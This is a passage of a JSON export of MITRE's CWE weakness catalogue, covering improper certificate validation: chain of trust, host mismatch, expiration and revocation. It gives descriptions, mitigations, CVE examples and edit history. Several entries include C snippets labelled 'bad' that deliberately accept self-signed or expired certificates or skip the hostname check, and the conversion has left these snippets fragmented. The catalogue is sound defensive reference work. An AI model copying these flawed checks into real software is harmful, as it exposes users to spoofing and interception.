hostname.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5817"},{"Reference":"CVE-2010-1378","Description":"chain: incorrect calculation allows attackers to bypass certificate checks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1378"},{"Reference":"CVE-2005-3170","Description":"LDAP client accepts certificates even if they are not from a trusted CA.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3170"},{"Reference":"CVE-2009-0265","Description":"chain: DNS server does not correctly check return value from the OpenSSL EVP_VerifyFinal function allows bypass of validation of the certificate chain.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0265"},{"Reference":"CVE-2003-1229","Description":"chain: product checks if client is trusted when it intended to check if the server is trusted, allowing validation of signed code.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1229"},{"Reference":"CVE-2002-0862","Description":"Cryptographic API, as used in web browsers, mail clients, and other software, does not properly validate Basic Constraints.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0862"},{"Reference":"CVE-2009-1358","Description":"chain: OS package manager does not check properly check the return value, allowing bypass using a revoked certificate.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1358"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A10","Entry_Name":"Insecure Configuration Management","Mapping_Fit":"CWE More Specific"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"459"}},{"attr":{"@_CAPEC_ID":"475"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-243"}},{"attr":{"@_External_Reference_ID":"REF-244"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-07-19","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Background_Details, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-12-28","Modification_Importance":"Critical","Modification_Comment":"Converted from category to weakness class."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Description, Name, Observed_Examples, Potential_Mitigations, References, Relationships, Time_of_Introduction, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Background_Details, Modes_of_Introduction, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples"}],"Previous_Entry_Name":{"#text":"Certificate Issues","attr":{"@_Date":"2013-02-21"}}}},"296":{"attr":{"@_ID":"296","@_Name":"Improper Following of a Certificate\'s Chain of Trust","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not follow, or incorrectly follows, the chain of trust for a certificate back to a trusted root certificate, resulting in incorrect trust of any resource that is associated with that certificate.","Extended_Description":{"xhtml:p":["If a system does not follow the chain of trust of a certificate to a root server, the certificate loses all usefulness as a metric of trust. Essentially, the trust gained from a certificate is derived from a chain of trust -- with a reputable trusted entity at the end of that list. The end user must trust that reputable source, and this reputable source must vouch for the resource in question through the medium of the certificate.","In some cases, this trust traverses several entities who vouch for one another. The entity trusted by the end user is at one end of this trust chain, while the certificate-wielding resource is at the other end of the chain. If the user receives a certificate at the end of one of these trust chains and then proceeds to check only that the first link in the chain, no real trust has been derived, since the entire chain must be traversed back to a trusted source to verify the certificate.","There are several ways in which the chain of trust might be broken, including but not limited to:"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Any certificate in the chain is self-signed, unless it the root.","Not every intermediate certificate is checked, starting from the original certificate all the way up to the root certificate.","An intermediate, CA-signed certificate does not have the expected Basic Constraints or other important extensions.","The root certificate has been compromised or authorized to the wrong party."]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"295","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"573","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Implementation","Note":"When the software uses certificate pinning, the developer might not properly validate all relevant components of the certificate before pinning the certificate. This can make it difficult or expensive to test after the pinning is complete."}]},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":[{"Scope":"Non-Repudiation","Impact":"Hide Activities","Note":"Exploitation of this flaw can lead to the trust of data that may have originated with a spoofed source."},{"Scope":["Integrity","Confidentiality","Availability","Access Control"],"Impact":["Gain Privileges or Assume Identity","Execute Unauthorized Code or Commands"],"Note":"Data, requests, or actions taken by the attacking entity can be carried out as a spoofed benign entity."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Ensure that proper certificate checking is included in the system design."},{"Phase":"Implementation","Description":"Understand, and properly implement all checks necessary to ensure the integrity of certificate trust integrity."},{"Phase":"Implementation","Description":"If certificate pinning is being used, ensure that all relevant properties of the certificate are fully validated before the certificate is pinned, including the full chain of trust."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-121"},"Intro_Text":"This code checks the certificate of a connected peer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"if ((cert = SSL_get_peer_certificate(ssl)) &amp;&amp; host)if ((X509_V_OK==foo) || X509_V_ERR_SELF_SIGNED_CERT_IN_CHAIN==foo))","xhtml:div":[{"#text":"foo=SSL_get_verify_result(ssl);","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"// certificate looks good, host can be trusted"}}],"xhtml:br":""}},"Body_Text":"In this case, because the certificate is self-signed, there was no external authority that could prove the identity of the host. The program could be communicating with a different system that is spoofing the host, e.g. by poisoning the DNS cache or using an Adversary-in-the-Middle (AITM) attack to modify the traffic from server to client."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2016-2402","Description":"Server allows bypass of certificate pinning by sending a chain of trust that includes a trusted CA that is not pinned.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2402"},{"Reference":"CVE-2008-4989","Description":"Verification function trusts certificate chains in which the last certificate is self-signed.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4989"},{"Reference":"CVE-2012-5821","Description":"Chain: Web browser uses a TLS-related function incorrectly, preventing it from verifying that a server\'s certificate is signed by a trusted certification authority (CA).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5821"},{"Reference":"CVE-2009-3046","Description":"Web browser does not check if any intermediate certificates are revoked.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3046"},{"Reference":"CVE-2009-0265","Description":"chain: DNS server does not correctly check return value from the OpenSSL EVP_VerifyFinal function allows bypass of validation of the certificate chain.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0265"},{"Reference":"CVE-2009-0124","Description":"chain: incorrect check of return value from the OpenSSL EVP_VerifyFinal function allows bypass of validation of the certificate chain.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0124"},{"Reference":"CVE-2002-0970","Description":"File-transfer software does not validate Basic Constraints of an intermediate CA-signed certificate.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0970"},{"Reference":"CVE-2002-0862","Description":"Cryptographic API, as used in web browsers, mail clients, and other software, does not properly validate Basic Constraints.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0862"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Failure to follow chain of trust in certificate validation"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-245"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 23: Improper Use of PKI, Especially SSL.&#34; Page 347"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Name, Observed_Examples, Other_Notes, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Modes_of_Introduction, Observed_Examples, Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":[{"#text":"Failure to Follow Chain of Trust in Certificate Validation","attr":{"@_Date":"2009-03-10"}},{"#text":"Improper Following of Chain of Trust for Certificate Validation","attr":{"@_Date":"2013-02-21"}}]}},"297":{"attr":{"@_ID":"297","@_Name":"Improper Validation of Certificate with Host Mismatch","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software communicates with a host that provides a certificate, but the software does not properly ensure that the certificate is actually associated with that host.","Extended_Description":{"xhtml:p":["Even if a certificate is well-formed, signed, and follows the chain of trust, it may simply be a valid certificate for a different site than the site that the software is interacting with. If the certificate\'s host-specific data is not properly checked - such as the Common Name (CN) in the Subject or the Subject Alternative Name (SAN) extension of an X.509 certificate - it may be possible for a redirection or spoofing attack to allow a malicious host with a valid certificate to provide data, impersonating a trusted host. In order to ensure data integrity, the certificate must be valid and it must pertain to the site that is being accessed.","Even if the software attempts to check the hostname, it is still possible to incorrectly check the hostname. For example, attackers could create a certificate with a name that begins with a trusted name followed by a NUL byte, which could cause some string-based comparisons to only examine the portion that contains the trusted name.","This weakness can occur even when the software uses Certificate Pinning, if the software does not verify the hostname at the time a certificate is pinned."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"923","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"295","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Implementation","Note":"When the software uses certificate pinning, the developer might not properly validate all relevant components of the certificate before pinning the certificate. This can make it difficult or expensive to test after the pinning is complete."}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"The data read from the system vouched for by the certificate may not be from the expected system."},{"Scope":["Authentication","Other"],"Impact":"Other","Note":"Trust afforded to the system in question - based on the malicious certificate - may allow for spoofing or redirection attacks."}]},"Detection_Methods":{"Detection_Method":[{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":"Set up an untrusted endpoint (e.g. a server) with which the software will connect.  Create a test certificate that uses an invalid hostname but is signed by a trusted CA and provide this certificate from the untrusted endpoint. If the software performs any operations instead of disconnecting and reporting an error, then this indicates that the hostname is not being checked and the test certificate has been accepted."},{"Method":"Black Box","Description":"When Certificate Pinning is being used in a mobile application, consider using a tool such as Spinner [REF-955].  This methodology might be extensible to other technologies."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Fully check the hostname of the certificate and provide the user with adequate information about the nature of the problem and how to proceed."},{"Phase":"Implementation","Description":"If certificate pinning is being used, ensure that all relevant properties of the certificate are fully validated before the certificate is pinned, including the hostname."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-122"},"Intro_Text":"The following OpenSSL code obtains a certificate and verifies it.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"cert = SSL_get_peer_certificate(ssl);if (cert &amp;&amp; (SSL_get_verify_result(ssl)==X509_V_OK)) {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"// do secret things"}}}},"Body_Text":"Even though the \\"verify\\" step returns X509_V_OK, this step does not include checking the Common Name against the name of the host. That is, there is no guarantee that the certificate is for the desired host. The SSL connection could have been established with a malicious host that provided a valid certificate."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2012-5810","Description":"Mobile banking application does not verify hostname, leading to financial loss.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5810"},{"Reference":"CVE-2012-5811","Description":"Mobile application for printing documents does not verify hostname, allowing attackers to read sensitive documents.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5811"},{"Reference":"CVE-2012-5807","Description":"Software for electronic checking does not verify hostname, leading to financial loss.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5807"},{"Reference":"CVE-2012-3446","Description":"Cloud-support library written in Python uses incorrect regular expression when matching hostname.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3446"},{"Reference":"CVE-2009-2408","Description":"Web browser does not correctly handle \'\\\\0\' character (NUL) in Common Name, allowing spoofing of https sites.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2408"},{"Reference":"CVE-2012-0867","Description":"Database program truncates the Common Name during hostname verification, allowing spoofing.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0867"},{"Reference":"CVE-2010-2074","Description":"Incorrect handling of \'\\\\0\' character (NUL) in hostname verification allows spoofing.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2074"},{"Reference":"CVE-2009-4565","Description":"Mail server\'s incorrect handling of \'\\\\0\' character (NUL) in hostname verification allows spoofing.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4565"},{"Reference":"CVE-2009-3767","Description":"LDAP server\'s incorrect handling of \'\\\\0\' character (NUL) in hostname verification allows spoofing.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3767"},{"Reference":"CVE-2012-5806","Description":"Payment processing module does not verify hostname when connecting to PayPal using PHP fsockopen function.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5806"},{"Reference":"CVE-2012-2993","Description":"Smartphone device does not verify hostname, allowing spoofing of mail services.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2993"},{"Reference":"CVE-2012-5804","Description":"E-commerce module does not verify hostname when connecting to payment site.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5804"},{"Reference":"CVE-2012-5824","Description":"Chat application does not validate hostname, leading to loss of privacy.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5824"},{"Reference":"CVE-2012-5822","Description":"Application uses third-party library that does not validate hostname.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5822"},{"Reference":"CVE-2012-5819","Description":"Cloud storage management application does not validate hostname.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5819"},{"Reference":"CVE-2012-5817","Description":"Java library uses JSSE SSLSocket and SSLEngine classes, which do not verify the hostname.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5817"},{"Reference":"CVE-2012-5784","Description":"SOAP platform does not verify the hostname.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5784"},{"Reference":"CVE-2012-5782","Description":"PHP library for payments does not verify the hostname.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5782"},{"Reference":"CVE-2012-5780","Description":"Merchant SDK for payments does not verify the hostname.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5780"},{"Reference":"CVE-2003-0355","Description":"Web browser does not validate Common Name, allowing spoofing of https sites.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0355"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Failure to validate host-specific certificate data"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-245"}},{"attr":{"@_External_Reference_ID":"REF-243"}},{"attr":{"@_External_Reference_ID":"REF-249"}},{"attr":{"@_External_Reference_ID":"REF-250"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 23: Improper Use of PKI, Especially SSL.&#34; Page 347"}},{"attr":{"@_External_Reference_ID":"REF-955"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Name, Observed_Examples, References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-01-16","Modification_Comment":"Integrated mitigations and detection methods for Certificate Pinning based on feedback from the CWE Researcher List in December 2017."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Common_Consequences, Description, Detection_Factors, Modes_of_Introduction, Potential_Mitigations, References, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, References, Relationships"}],"Previous_Entry_Name":[{"#text":"Failure to Validate Host-specific Certificate Data","attr":{"@_Date":"2009-03-10"}},{"#text":"Improper Validation of Host-specific Certificate Data","attr":{"@_Date":"2013-02-21"}}]}},"298":{"attr":{"@_ID":"298","@_Name":"Improper Validation of Certificate Expiration","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"A certificate expiration is not validated or is incorrectly validated, so trust may be assigned to certificates that have been abandoned due to age.","Extended_Description":"When the expiration of a certificate is not taken into account, no trust has necessarily been conveyed through it. Therefore, the validity of the certificate cannot be verified and all benefit of the certificate is lost.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"295","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"672","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Implementation","Note":"When the software uses certificate pinning, the developer might not properly validate all relevant components of the certificate before pinning the certificate. This can make it difficult or expensive to test after the pinning is complete."}]},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":[{"Scope":["Integrity","Other"],"Impact":"Other","Note":"The data read from the system vouched for by the expired certificate may be flawed due to malicious spoofing."},{"Scope":["Authentication","Other"],"Impact":"Other","Note":"Trust afforded to the system in question - based on the expired certificate - may allow for spoofing attacks."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Check for expired certificates and provide the user with adequate information about the nature of the problem and how to proceed."},{"Phase":"Implementation","Description":"If certificate pinning is being used, ensure that all relevant properties of the certificate are fully validated before the certificate is pinned, including the expiration."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-123"},"Intro_Text":"The following OpenSSL code ensures that there is a certificate and allows the use of expired certificates.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"if (cert = SSL_get_peer(certificate(ssl)) {","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"foo=SSL_get_verify_result(ssl);if ((X509_V_OK==foo) || (X509_V_ERR_CERT_HAS_EXPIRED==foo))","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"//do stuff"}}}}}},"Body_Text":"If the call to SSL_get_verify_result() returns X509_V_ERR_CERT_HAS_EXPIRED, this means that the certificate has expired. As time goes on, there is an increasing chance for attackers to compromise the certificate."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Failure to validate certificate expiration"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 23: Improper Use of PKI, Especially SSL.&#34; Page 347"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Common_Consequences, Modes_of_Introduction, Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"Failure to Validate Certificate Expiration","attr":{"@_Date":"2009-03-10"}}}},"299":{"attr":{"@_ID":"299","@_Name":"Improper Check for Certificate Revocation","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not check or incorrectly checks the revocation status of a certificate, which may cause it to use a certificate that has been compromised.","Extended_Description":"An improper check for certificate revocation is a far more serious flaw than related certificate failures. This is because the use of any revoked certificate is almost certainly malicious. The most common reason for certificate revocation is compromise of the system in question, with the result that no legitimate servers will be using a revoked certificate, unless they are sorely out of 